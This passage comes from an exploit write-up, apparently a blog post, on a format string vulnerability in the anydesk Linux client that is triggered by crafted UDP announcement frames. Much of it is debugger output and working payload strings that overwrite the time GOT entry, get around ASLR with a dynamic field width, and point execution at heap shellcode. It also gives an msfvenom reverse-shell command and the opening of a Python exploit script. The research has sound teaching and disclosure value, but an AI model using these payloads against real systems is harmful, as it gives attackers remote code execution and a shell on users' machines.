0x7ffffffeafd0:	"Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.0x1453d80 2.(nil) 3.0x7ffff1784c40 4.0x10 5.0xb366d8 6.(nil) 7.0x1482b01 8.0x7ffff5e4ee24 9.0x1453d80 10.(nil)'"

The first four parameters were indeed taken from the reg_save_area and all following values from the overflow_arg_arena. The following picture summarizes the structure:

Gaining arbitrary write

After we have clarified what we can access with the format string, we need to find some data that we can control in the accessible data. If we can directly control data within the reg_save_area or overflow_arg_area, we could store the address of the time GOT entry and write to it using the %n format specifier.

Within the reg_save_area there are only 4 values we can access. These do obviously not contain any data of our input. All following parameters are stored in the overflow_arg_area. Let’s have a look at the first 50 values stored there using the telescope command:

gdb-peda$ telescope 0x00007ffffffeb970 50
0000| 0x7ffffffeb970 --> 0xb366d8 --> 0x62696c67 ('glib')
0008| 0x7ffffffeb978 --> 0x0 
0016| 0x7ffffffeb980 --> 0x1530801 --> 0xe000007ffff17853 
0024| 0x7ffffffeb988 --> 0x7ffff5e4ee24 (test   eax,eax)
0032| 0x7ffffffeb990 --> 0x167ec00 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1,%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
0040| 0x7ffffffeb998 --> 0x0 
0048| 0x7ffffffeb9a0 --> 0x10 
0056| 0x7ffffffeb9a8 --> 0x7ffff5e501cd (<g_logv+605>:	mov    eax,r14d)
0064| 0x7ffffffeb9b0 --> 0x7ffff7a5389b --> 0x4b544700006b7447 ('Gtk')
0072| 0x7ffffffeb9b8 --> 0x167ec00 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1,%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
0080| 0x7ffffffeb9c0 --> 0x1fffeb9d0 
0088| 0x7ffffffeb9c8 --> 0x4342b0 (push   rbp)
0096| 0x7ffffffeb9d0 --> 0x0 
0104| 0x7ffffffeb9d8 --> 0x7ffff7a5389b --> 0x4b544700006b7447 ('Gtk')
0112| 0x7ffffffeb9e0 --> 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
0120| 0x7ffffffeb9e8 --> 0x0 
0128| 0x7ffffffeb9f0 --> 0x155dd20 --> 0x7fffdc00f3d0 --> 0x1514300 --> 0x1513da0 --> 0x14d6e00 (--> ...)
0136| 0x7ffffffeb9f8 --> 0x0 
0144| 0x7ffffffeba00 --> 0x500000000 
0152| 0x7ffffffeba08 --> 0x7ffff5e9acd8 ("Invalid UTF-8 encoded text in name - not valid '%s'")
0160| 0x7ffffffeba10 --> 0x0 
0168| 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
0176| 0x7ffffffeba20 --> 0x7ffff5e969e1 --> 0x4600303262696c67 ('glib20')
...

We can see a few occurrences of the heap address of the format string. Although we control parts of the format string, we don’t control the address, which is what we would need to. Searching even further down the stack for possible data we can control does not yield anything useful. So it seems that we can’t control any data, which we can access with the format string. Is this already a dead end? Of course not!

Taking a look at the values above again, we can see that there are stack addresses stored on the stack. There are even stack addresses, which reference the area we can access. For example at offset 112 the stack address 0x7ffffffeba18 is stored, which corresponds to offset 168:

...
0112| 0x7ffffffeb9e0 --> 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
...
0168| 0x7ffffffeba18 --> 0x7ffff1431f9b (<__GI___libc_realloc+875>:	mov    r8,QWORD PTR [rsp+0x8])
...

If we use the appropriate argument selector we can use this stack address to write to the area we can access. We can then use another argument selector to reference the data we wrote. The following picture visualizes the basic idea:

The problem here is that we cannot do this in a single call of vsnprintf. All referenced data is fetched before data is written by the %n format specifier. This means that the %19$ln would indeed overwrite the data on the stack, but the %26$ln would still evaluate to the old value, which was stored there. Accordingly we need two calls:

  1. Store address of time GOT entry on the stack
  2. Write to previously stored GOT entry address in order to control instruction pointer

As you may remember, the vulnerable call to vsnprintf is actually made twice for the very same format string. Though it turned out that the call path for both of these calls vary. Because of this also the stack layout varies. This means that an argument selector (e.g. %26$ln) on the first call will not reference the same value on the second call. We also need to keep in mind that we cannot change the format string in-between the two calls. If we e.g. use %200$n on the first call, to write the GOT address on the stack, we need to ensure that %200$n on the second call also references a writable address, because we trigger a segmentation fault otherwise. This is not only true for %n we use to store the GOT address but also for the second %n, we need to use in order to actually write to the GOT entry. Unfortunately there did not seem to be any values on the stack, which would fulfill these requirements.

Thus we need another approach. The first thing that came into my mind was to send two independent announcement frames. We need to trigger the vulnerability twice, so let’s just trigger it twice via the initial attack vector. Because of the duplicate call this actually results in four calls to vsnprintf. We still must ensure that the %n used on the respective first call also references a writable memory location on the associated second call, but since we only need to use one %n format specifier in each pair of calls, stack values can be found to fulfill this requirement.

Although the approach using two separate announcement frames seemed to work, I did not really like it. One reason for this is the duplicate call of vsnprintf. We must accept that the second call writes somewhere into memory even though it is not relevant for our exploit. Also the two announcement frames may interfere with legitimate announcement frames, which are sent in the same time window (the GUI gets updated only every 5 seconds). These aspects may reduce the reliability of the exploit.

While thinking about this and looking at the GUI another idea came into my mind:

The GUI displays not only the hostname, but also the username. So far we triggered the vulnerability only by using the hostname. But the username should also be prone to this. Let’s verify this by sending the following announcement frame:

p = gen_discover_packet(4919, 1, '\x85\xfeHOSTNAME %p', '\x85\xfeUSERNAME %p', 'ad', 'main')

After a few seconds the GUI updates and the breakpoint on the vsnprintf call is hit:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 47: Invalid UTF-8 encoded text in name - not valid '\205\376USERNAME %p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 

Inspecting the format string (third parameter) we can see that the username indeed triggered the vulnerability. After continuing the execution the breakpoint is hit again:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 47: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME %p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 

This time the vulnerability was triggered by the hostname. If we further continue the execution both calls (for username and hostname) are repeated.

Thus we verified that the vulnerability can be triggered using both the hostname and the username. This is a good news for our exploit because we can now use two independent format strings, which are sent in a single UDP packet and are both evaluated before the duplicate call is triggered.

What we have to do now is to find an accessible stack address, which we will write the GOT address to. For this we must keep in mind that the values on the stack between the two vsnprintf calls may change / get overwritten. If we write to an stack address, which is too near to the top of the stack, it is very likely that it has been overwritten at the time of the second call. Finding a suitable value is only a matter of try and error. We write to an address on the first call and then verify that the value we wrote is still the same on the second call.

The stack address 0x7ffffffebe70, which can be accessed using the argument selector %93$ln fits our needs:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376USERNAME %93$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
0008| 0x7ffffffeaaf8 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0016| 0x7ffffffeab00 --> 0x171f0c0 --> 0x0 
0024| 0x7ffffffeab08 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0032| 0x7ffffffeab10 --> 0x7ffffffeae70 --> 0x0 
0040| 0x7ffffffeab18 --> 0x7ffff5e379d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffffffeab20 --> 0x138b230 --> 0x11f6ab0 --> 0x11e7340 --> 0x31 ('1')
0056| 0x7ffffffeab28 --> 0x1715ca0 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 2, 0x00000000008ab346 in ?? ()
gdb-peda$ telescope 0x00007ffffffeb970 100
...
0704| 0x7ffffffebc30 --> 0x7ffffffebe70 --> 0x6ffffec070
...

After the first call the value 0x90 (the characters written so far) is written to 0x7ffffffebe70:

gdb-peda$ ni
...
[-------------------------------------code-------------------------------------]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
   0x8ab346:	call   0x412d90 <vsnprintf@plt>
=> 0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
   0x8ab35c:	call   0x4123d0 <gettimeofday@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
0008| 0x7ffffffeaaf8 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0016| 0x7ffffffeab00 --> 0x171f0c0 --> 0x0 
0024| 0x7ffffffeab08 --> 0x7ffffffeac50 --> 0x55fe85272064696c 
0032| 0x7ffffffeab10 --> 0x7ffffffeae70 --> 0x0 
0040| 0x7ffffffeab18 --> 0x7ffff5e379d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffffffeab20 --> 0x138b230 --> 0x11f6ab0 --> 0x11e7340 --> 0x31 ('1')
0056| 0x7ffffffeab28 --> 0x1715ca0 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000008ab34b in ?? ()
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x0000000000000090

When the breakpoint is hit again on the second call, the value is still the same:

gdb-peda$ c
Continuing.
...
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME %165$p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x2249 ('I"')
0008| 0x7ffffffeaaf8 --> 0x2bc 
0016| 0x7ffffffeab00 --> 0x158c710 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbad94 
0032| 0x7ffffffeab10 --> 0x5ecbad94 
0040| 0x7ffffffeab18 --> 0xab240 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x0000000000000090

On the second call we can access the value using the argument selector %165$p (offset 1280):

gdb-peda$ telescope 0x00007ffffffeb970 200
...
1280| 0x7ffffffebe70 --> 0x90
...

Controlling the instruction pointer

Now we are finally ready to overwrite the GOT entry of time. At first let’s determine the address of the GOT entry:

gdb-peda$ p/x &'time@got.plt'
$1 = 0x119ddc0

Accordingly the GOT entry of time is stored at 0x119ddc0. In order to write this value, we can pad the output of vsnprintf accordingly using a field width. If you are not familiar with this, please refer to my writeup on RPISEC/MBE lab04B. The error message itself (Failed to set text from markup ...) contains 133 characters. Also we need to add two characters for an invalid UTF-8 sequence. Thus we have to pad the output to 18472249 characters:

0x119ddc0 = 18472384 (time GOT)
18472384 - 133 - 2 = 18472249

Let’s verify this by sending the following announcement frame:

p = gen_discover_packet(4919, 1, '\x85\xfeHOSTNAME %165$p', '\x85\xfe%18472249x%93$ln', 'ad', 'main')

After the first call to vsnprintf the target stack address (0x7ffffffebe70) actually contains the GOT address of time:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 52: Invalid UTF-8 encoded text in name - not valid '\205\376%18472249x%93$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
...
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x0000006ffffec070
gdb-peda$ ni
...
gdb-peda$ x/xg 0x7ffffffebe70
0x7ffffffebe70:	0x000000000119ddc0

The %165$p format specifier on the second call successfully references the GOT address:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME %165$p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
...
gdb-peda$ ni
gdb-peda$ x/s 0x7ffffffeafd0
0x7ffffffeafd0:	"Failed to set text from markup due to error parsing markup: Error on line 1 char 51: Invalid UTF-8 encoded text in name - not valid '\205\376HOSTNAME 0x119ddc0'"

The next step is to replace the %p format specifier with %ln in order to write a 8 byte value to the GOT entry on the second call. This way we should be able to control the instruction pointer, when the call to time is triggered after the vsnprintf call. Let’s verify this by writing the value 0x1337:

0x1337 = 4919
4919 - 133 - 2 = 4784

This time we adjust the hostname accordingly:

p = gen_discover_packet(4919, 1, '\x85\xfe%4784x%165$ln', '\x85\xfe%18472249x%93$ln', 'ad', 'main')

After sending the frame and continuing to the second call to vsnprintf, to GOT entry of time is still untouched:

[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x2743 ("C'")
0008| 0x7ffffffeaaf8 --> 0x357 
0016| 0x7ffffffeab00 --> 0x158cf10 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbb8cc 
0032| 0x7ffffffeab10 --> 0x5ecbb8cc 
0040| 0x7ffffffeab18 --> 0xd0f51 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x00007ffff7ffb930

By executing the vsnprintf call the value 0x1337 is successfully written:

gdb-peda$ ni
...
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x0000000000001337

If we now continue the execution, the immediately following call to time raises a segmentation fault with the instruction pointer being 0x1337:

gdb-peda$ c
Continuing.

Thread 1 "anydesk" received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x1338 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x0 
RDX: 0x0 
RSI: 0x7ffff1784ca0 --> 0x16c1400 --> 0x276e00 ('')
RDI: 0x7ffffffeab08 --> 0x5ecbb8cc 
RBP: 0x5 
RSP: 0x7ffffffeaae8 --> 0x8ab355 (lea    rdi,[rsp+0x20])
RIP: 0x1337 
R8 : 0x1 
R9 : 0x6e ('n')
R10: 0x1 
R11: 0xa ('\n')
R12: 0x7ffffffeb898 --> 0x3000000018 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1453ea0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
R15: 0x4
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x1337
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaae8 --> 0x8ab355 (lea    rdi,[rsp+0x20])
0008| 0x7ffffffeaaf0 --> 0x2743 ("C'")
0016| 0x7ffffffeaaf8 --> 0x357 
0024| 0x7ffffffeab00 --> 0x158cf10 --> 0x0 
0032| 0x7ffffffeab08 --> 0x5ecbb8cc 
0040| 0x7ffffffeab10 --> 0x5ecbb8cc 
0048| 0x7ffffffeab18 --> 0xd0f51 
0056| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000001337 in ?? ()

We successfully control the instruction pointer.

Hitting our shellcode: dynamic field width

At next we must decide where we want to point the instruction pointer to. At the very beginning we figured out, that the security mechanisms of the binary are quite weak. Actually the heap, where the format string we control is stored, is executable:

gdb-peda$ vmmap 0x1453ea0
Start              End                Perm	Name
0x011c4000         0x017c8000         rwxp	[heap]

This means that we can store a shellcode within the format string and redirect the instruction pointer to this shellcode. Though we need to keep in mind that we manually disabled ASLR and in fact don’t know any heap address. A common approach to bypass ALSR is to leak a memory address. Especially for basic format string vulnerabilities this is an easy to achieve goal. In this case however we don’t get any response from the application. The result of the format string is written to the log file, which we don’t have access to. Thus we cannot leak any heap address.

Nevertheless we can successfully bypass ASLR using a dynamic field width. Since this does not seem to be very well-known, let’s have a look at a short example. We have already used the ordinary field width in order to pad the output effectively increasing the amount of characters written, which makes %n write a bigger value:

user@w00d:~$ cat sample1.c
#include <stdio.h>

int main() {

  int out;
  printf("%100x%1$n", &out);
  printf("\nout = %d\n", out);

  return 0;
}

The %100x format specifier prints the first argument as a hexadecimal number, which is padded to 100 characters. Accordingly 100 characters are written. This amount will be written to the out variable by using the %1$n format specifier:

user@w00d:~$ ./sample1 
                                                                                            ffffded4
out = 100

In this case the field width was statically set to 100. But we can also use a dynamic field width:

user@w00d:~$ cat sample2.c 
#include <stdio.h>

int main() {

  int out;
  int field_width = 123;
  printf("%1$*2$x%1$n", &out, field_width);
  printf("\nout = %d\n", out);

  return 0;
}

We introduced a new variable called field_width, which is passed as the second argument to printf. Also we changed the %100x format specifier to %1$*2$x. At first the syntax might look a little bit confusing, but actually it is quite simple: The 1$ at the beginning determines, which value we want to print. In this case we just take the first argument, just like the %100x did (4 byte of out address). This is separated by an asterisk (*) from the second part: 2$. This determines which value should be used for the field width. In this case the variable field_width, which is the second argument. Accordingly when running the program the value of field_width (123) is written to the variable out:

user@w00d:~$ ./sample2 
                                                                                                                   ffffded0
out = 123

After this short introduction to the dynamic field width, let’s see how we can leverage this feature.

When inspecting all accessible parameters on the second call to vsnprintf (hostname), we can see that we can access the heap address of the format string. The reg_save_area is stored at 0x00007ffffffeb8b0. The value of gp_offset is 0x10, which means the first argument we can access is stored at 0x00007ffffffeb8b0 + 0x10 = 0x00007ffffffeb8c0:

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffffffeb898 --> 0x3000000010 
RDX: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
RSI: 0x400 
RDI: 0x7ffffffeafd0 --> 0x7 
RBP: 0x5 
RSP: 0x7ffffffeaaf0 --> 0x28e3 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0xffffffa7 
R11: 0x7ffff1548550 --> 0xfff08320fff08310 
R12: 0x7ffffffeb898 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1412190 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 49: Invalid UTF-8 encoded text in name - not valid '\205\376%4784x%165$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x28e3 
0008| 0x7ffffffeaaf8 --> 0x1e6 
0016| 0x7ffffffeab00 --> 0x158bf10 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbbcb0 
0032| 0x7ffffffeab10 --> 0x5ecbbcb0 
0040| 0x7ffffffeab18 --> 0x76cd1 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$ x/2xw 0x7ffffffeb898
0x7ffffffeb898:	0x00000010	0x00000030
gdb-peda$ x/2xg 0x7ffffffeb898+8
0x7ffffffeb8a0:	0x00007ffffffeb970	0x00007ffffffeb8b0
gdb-peda$ x/4xg 0x00007ffffffeb8b0+0x10
0x7ffffffeb8c0:	0x0000000001412190	0x0000000000000000
0x7ffffffeb8d0:	0x00007ffff1784c40	0x0000000000000010

The first accessible argument at 0x00007ffffffeb8c0 is actually the heap address of the format string (0x0000000001412190). If we use this address as a dynamic field width, we can actually write its value to the time GOT entry.

By changing the hostname to the following value, we write the heap address + the amounts of characters written so far (error message and two bytes invalid UTF-8 sequence) to the time GOT entry:

p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%165$ln', '\x85\xfe%18472249x%93$ln', 'ad', 'main')

After sending the frame we continue to the second call. The GOT entry is still untouched:

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffffffeb898 --> 0x3000000010 
RDX: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 50: Invalid UTF-8 encoded text in name - not valid '\205\376%1$*1$x%165$ln'")
RSI: 0x400 
RDI: 0x7ffffffeafd0 --> 0x7 
RBP: 0x5 
RSP: 0x7ffffffeaaf0 --> 0x2db9 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0x21 ('!')
R11: 0x7ffff1548550 --> 0xfff08320fff08310 
R12: 0x7ffffffeb898 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1570630 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 50: Invalid UTF-8 encoded text in name - not valid '\205\376%1$*1$x%165$ln'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 50: Invalid UTF-8 encoded text in name - not valid '\205\376%1$*1$x%165$ln'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x2db9 
0008| 0x7ffffffeaaf8 --> 0x9d 
0016| 0x7ffffffeab00 --> 0x158df10 --> 0x0 
0024| 0x7ffffffeab08 --> 0x5ecbc775 
0032| 0x7ffffffeab10 --> 0x5ecbc775 
0040| 0x7ffffffeab18 --> 0x26709 
0048| 0x7ffffffeab20 --> 0xdd73d0 --> 0x8c3200 (mov    QWORD PTR [rdi],0xdd73d0)
0056| 0x7ffffffeab28 --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x00007ffff7ffb930

After executing the call the GOT entry contains the heap address 0x00000000015706b7:

gdb-peda$ ni
...
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x00000000015706b7

The %n wrote the field width (the heap address of the format string 0x1570630) + the characters written so far. The resulting address (0x00000000015706b7) references the beginning of our format specifier:

gdb-peda$ x/s 0x00000000015706b7
0x15706b7:	"%1$*1$x%165$ln'"

Since we want to make the address point to actual shellcode, which we can append to the format string, we further need to add a little bit of padding. The following hostname adds another 18 characters of padding (%18x) and a dummy shellcode (0xcc):

shellcode = '\xcc'
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')

Now the GOT entry is overwritten with the address of the shellcode:

...
gdb-peda$ x/xg 0x119ddc0
0x119ddc0 <time@got.plt>:	0x0000000001379549

gdb-peda$ x/i 0x0000000001379549
   0x1379549:	int3   

Final exploit

Finally it is time to generate a real payload:

kali@kali:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
...

Please notice the bad bytes. 0x00 is excluded to prevent the string from being terminated. 0x25 (%) would introduce another format specifier and 0x26 (&) is used by glib and must also be avoided.

The final exploit script looks like this:

#!/usr/bin/env python

import struct
import socket
import sys

ip = '127.0.0.1'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
  d += struct.pack('>I', ad_id)
  d += struct.pack('>I', 0)
  d += chr(0x2)+chr(os)
  d += struct.pack('>I', len(hn)) + hn
  d += struct.pack('>I', len(user)) + user
  d += struct.pack('>I', 0)
  d += struct.pack('>I', len(inf)) + inf
  d += chr(0)
  d += struct.pack('>I', len(func)) + func
  d += chr(0x2)+chr(0xc3)+chr(0x51)
  return d


shellcode =  b""
